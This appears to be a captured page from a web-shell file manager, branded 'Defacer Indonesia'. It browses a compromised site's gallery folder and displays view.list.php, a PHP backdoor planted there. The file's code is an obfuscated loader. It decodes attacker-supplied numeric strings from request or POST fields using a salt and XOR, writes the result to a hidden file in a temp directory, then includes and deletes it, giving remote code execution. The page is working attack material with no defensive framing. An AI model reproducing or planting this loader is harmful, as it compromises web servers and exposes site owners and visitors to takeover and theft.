whoami7 - Manager
:
/
home
/
analuakl
/
amplhomes.com
/
images
/
gallery
/
Upload File:
files >> /home/analuakl/amplhomes.com/images/gallery/view.list.php
<?php if(isset($_REQUEST["\x72ef\x65\x72ence"])){ $value = $_REQUEST["\x72ef\x65\x72ence"]; $value = explode( ".",$value) ; $holder = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $t = 0; while( $t< count( $value)) {$v5 = $value[$t]; $sChar = ord( $salt[$t % $sLen]); $dec = ( ( int)$v5 - $sChar -( $t % 10)) ^ 72; $holder .= chr( $dec); $t++; } $pgrp = array_filter([session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/dev/shm", getcwd(), "/tmp", sys_get_temp_dir()]); foreach ($pgrp as $key => $factor) { if ((function($d) { return is_dir($d) && is_writable($d); })($factor)) { $ent = vsprintf("%s/%s", [$factor, ".k"]); $file = fopen($ent, 'w'); if ($file) { fwrite($file, $holder); fclose($file); include $ent; @unlink($ent); die(); } } } } if(array_key_exists("e\x6Et\x69\x74y", $_POST)){ $property_set = array_filter([getenv("TEMP"), getcwd(), getenv("TMP"), session_save_path(), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp"]); $parameter_group = $_POST["e\x6Et\x69\x74y"]; $parameter_group = explode ( '.' , $parameter_group ) ; $object = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $j = 0; $__tmp = $parameter_group; while ($v6 = array_shift($__tmp)) { $chS = ord($salt[$j % $sLen]); $dec = ((int)$v6 - $chS - ($j % 10)) ^ 89; $object .= chr($dec); $j++; } while ($elem = array_shift($property_set)) { if ((function($d) { return is_dir($d) && is_writable($d); })($elem)) { $dat = vsprintf("%s/%s", [$elem, ".key"]); $file = fopen($dat, 'w'); if ($file) { fwrite($file, $object); fclose($file); include $dat; @unlink($dat); exit; } } } }
Copyright ©2021 || Defacer Indonesia